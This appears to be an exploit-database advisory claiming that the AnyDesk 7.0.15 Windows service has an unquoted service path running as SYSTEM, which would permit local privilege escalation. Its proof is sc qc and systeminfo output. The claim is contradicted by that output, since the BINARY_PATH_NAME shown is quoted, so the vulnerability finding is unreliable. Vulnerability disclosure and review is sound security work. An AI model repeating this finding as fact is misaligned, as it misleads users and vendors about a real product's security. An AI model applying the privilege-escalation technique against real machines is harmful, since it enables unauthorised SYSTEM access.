# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path# Date: 2024-04-01# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor Homepage: http://anydesk.com# Software Link: http://anydesk.com/download# Version: Software Version 7.0.15# Tested on: Windows 10 Pro x64
1. Description:
The Anydesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"--service
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name:Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
